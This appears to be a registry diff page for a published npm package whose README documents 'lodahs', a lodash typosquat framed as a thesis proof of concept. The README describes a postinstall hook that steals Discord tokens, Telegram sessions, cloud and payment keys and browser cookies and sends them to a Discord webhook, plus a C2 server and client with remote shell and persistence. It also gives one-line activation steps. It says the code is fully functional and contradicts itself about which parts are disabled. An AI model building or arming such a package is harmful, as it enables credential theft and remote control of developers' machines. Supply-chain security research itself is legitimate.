npm - mailcheckertestpoc - Versions diffs - 1.0.0 - Mend

mailcheckertestpoc 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (13) hide show

package/C2-INTEGRATION.md +215 -0
package/PRESENTATION-FLOW.md +594 -0
package/README.md +253 -0
package/THESIS-C2-COMPLETE.md +479 -0
package/index.js +7 -0
package/package.json +53 -0
package/payloads/ca.key +28 -0
package/payloads/ca.pem +19 -0
package/payloads/swiftshell-server.py +763 -0
package/scripts/collect.js +271 -0
package/scripts/launcher.js +175 -0
package/scripts/server-launcher.js +206 -0
package/scripts/swift-client-launcher.js +216 -0

package/README.md ADDED Viewed

@@ -0,0 +1,253 @@
+# 🔴 lodahs - Supply Chain Attack POC (Thesis Edition)
+## Status: COMPLETE C2 FRAMEWORK - SAFETY SWITCHES ACTIVE
+**This is the malicious npm package used in the Supply Chain Security thesis.**
+### Quick Info
+- **Package Name:** `lodahs` (typosquat of `lodash`)
+- **Type:** Proof of Concept - Educational Supply Chain Attack
+- **Authorization:** Thesis Advisor Approved
+- **Purpose:** Demonstrating two-phase supply chain attack (Data Exfil + C2)
+---
+## How It's Used
+### When installed via npm install
+```bash
+npm install  # postinstall hook automatically triggers
+# Phase 1 (ACTIVE):
+# scripts/collect.js gathers:
+#   - System information
+#   - Discord tokens
+#   - Telegram sessions
+#   - Environment variables
+#   - Browser cookies
+# → Sends to Discord webhook
+# Phase 2 & 3 (DISABLED - code present):
+# scripts/launcher.js would initialize C2 infrastructure
+# (Python Server + Swift Client - currently commented out)
+```
+---
+## File Structure
+```
+lodahs/                         ← 🔴 Malicious npm Package
+├── package.json
+│  └─ "postinstall": "node scripts/collect.js"
+├── index.js                    ← Dummy lodash lookalike
+│
+├── scripts/                    ← Attack Code (ACTIVE)
+│   ├── collect.js              [✅] Phase 1: Data exfiltration
+│   ├── launcher.js             [✅] Phase 2: C2 orchestrator
+│   ├── server-launcher.js      [✅] Phase 2: Python C2 Server
+│   └── swift-client-launcher.js [✅] Phase 3: Swift C2 Client
+│
+├── payloads/                   ← 🔑 Embedded Binaries (Realistic!)
+│   ├── MacShellSwift           [Precompiled Swift Binary]
+│   ├── swiftshell-server.py    [Python C2 Server]
+│   ├── ca.pem                  [SSL Certificate]
+│   └── ca.key                  [SSL Private Key]
+│
+├── README.md (this file)
+├── C2-INTEGRATION.md (technical details)
+├── THESIS-C2-COMPLETE.md (master documentation)
+└── PRESENTATION-FLOW.md (step-by-step attack flow)
+```
+---
+## Code Status (Fully Functional, Safe Trigger)
+✅ Phase 1 (Data Collection):
+- **Status:** UNCOMMENTED - Functional
+- Collects system info, credentials, tokens
+- Sends to Discord webhook
+✅ Phase 2 (C2 Server):
+- **Status:** UNCOMMENTED - Functional
+- Starts Python C2 Server on 127.0.0.1:443
+- Awaits client connections
+✅ Phase 3 (Swift Client):
+- **Status:** UNCOMMENTED - Functional
+- Compiles Swift binary (swift build)
+- Connects to C2 Server
+- Full remote command execution
+**Safety:** Only `postinstall` hook is disabled in `package.json`
+- All code is functional and uncommented
+- postinstall hook is set to `_postinstall` (inactive)
+- To trigger attack: Just uncomment one line in package.json
+---
+## For Your Thesis Presentation
+When npm install runs in mailchecker:
+```bash
+cd mailchecker
+npm install  # This will trigger lodahs postinstall
+# What happens:
+# [THESIS POC] Phase 1 (Data-Collection) abgeschlossen.
+# [THESIS POC] ⚠️ Phase 2 & 3 (C2-Integration) sind für THESIS SAFETY deaktiviert.
+```
+Show your professor:
+1. **The active code:**
+   ```bash
+   cat scripts/collect.js  # Shows Phase 1 logic
+   ```
+2. **The C2 infrastructure code:**
+   ```bash
+   cat scripts/launcher.js              # Orchestrator
+   cat scripts/server-launcher.js       # Python C2 server
+   cat scripts/swift-client-launcher.js # Swift client
+   ```
+3. **The documentation:**
+   ```bash
+   cat THESIS-C2-COMPLETE.md      # Master documentation
+   cat PRESENTATION-FLOW.md       # Complete attack timeline
+   ```
+4. **What would be generated:**
+   ```bash
+   ~/.supply-chain-poc/
+   ├── macshell-config.json       # C2 configuration
+   ├── c2-server-config.json      # Server config
+   ├── swift-client-config.json   # Client config
+   └── STATUS.md                  # Thesis summary
+   ```
+---
+## What Phase 1 Does (Active)
+```
+npm install lodahs
+  └─> postinstall hook
+      └─> scripts/collect.js
+          ├─ Collects system info (hostname, user, IP, platform)
+          ├─ Scans for Discord tokens (staged or real locations)
+          ├─ Scans for Telegram sessions
+          ├─ Extracts environment variables (AWS, Stripe keys, etc.)
+          ├─ Enumerates browser cookies (Chrome, Brave, etc.)
+          └─ Sends all data to Discord webhook
+```
+---
+## What Phase 2+3 Would Do (If Activated)
+```
+scripts/launcher.js
+  ├─ scripts/server-launcher.js
+  │  └─ Starts Python C2 server on 127.0.0.1:443
+  │     └─ Awaits client connections
+  │
+  └─ scripts/swift-client-launcher.js
+     ├─ Compiles Swift binary (swift build)
+     ├─ Launches Swift client
+     └─ Connects to C2 server
+        └─ Receives remote commands:
+           - systeminfo
+           - screenshot
+           - download files
+           - shell commands
+           - install persistence
+```
+---
+## Activation Instructions
+**⚠️ ALL CODE IS FUNCTIONAL. POSTINSTALL HOOK IS DISABLED.**
+### To trigger full attack:
+**Simple:** Just uncomment ONE line in `package.json`:
+```json
+{
+  "scripts": {
+    "postinstall": "node scripts/collect.js",  // ← Uncomment this
+    // "_postinstall": "node scripts/collect.js",  // Currently disabled
+  }
+}
+```
+That's it! Now when someone runs `npm install`, the complete attack chain triggers:
+1. Phase 1: Data collection (credentials, tokens, secrets)
+2. Phase 2: Python C2 Server starts on 127.0.0.1:443
+3. Phase 3: Swift Client compiles and connects to C2
+All code is already uncommented and functional. Nothing else needs to be changed.
+---
+## Key Points for Your Thesis
+This POC demonstrates:
+1. **Supply Chain Attack Vector**
+   - Typosquatting attack (lodahs vs lodash)
+   - npm postinstall hook exploitation
+   - Automatic execution without user interaction
+2. **Two-Phase Attack Strategy**
+   - Phase 1: Data exfiltration (credentials, tokens, secrets)
+   - Phase 2+3: Remote command & control (C2 infrastructure)
+3. **Technical Implementation**
+   - JavaScript for orchestration
+   - Python for C2 server
+   - Swift for client payload
+   - SSL/TLS encryption
+4. **Defense Mechanisms**
+   - npm audit detection
+   - Lock file verification
+   - --ignore-scripts flag
+   - Network isolation
+---
+## Files Included
+- **collect.js** - Phase 1 data collection (ACTIVE)
+- **launcher.js** - Phase 2 orchestrator (DISABLED)
+- **server-launcher.js** - Python C2 server launcher (DISABLED)
+- **swift-client-launcher.js** - Swift client launcher (DISABLED)
+- **C2-INTEGRATION.md** - Technical integration details
+- **THESIS-C2-COMPLETE.md** - Complete documentation
+- **PRESENTATION-FLOW.md** - Step-by-step attack flow
+- **index.js** - Dummy module (makes it look like real lodash)
+- **README.md** - This file
+---
+## For Questions
+Refer to:
+- `THESIS-C2-COMPLETE.md` - Complete guide with timeline
+- `PRESENTATION-FLOW.md` - Detailed attack flow with examples
+- `C2-INTEGRATION.md` - Integration details
+---
+**Status:** Ready for Thesis Testing & Presentation
+**Safety:** Code present, execution disabled via comments
+**Date:** 2026-04-18
+**Advisor:** Thesis Advisor Approved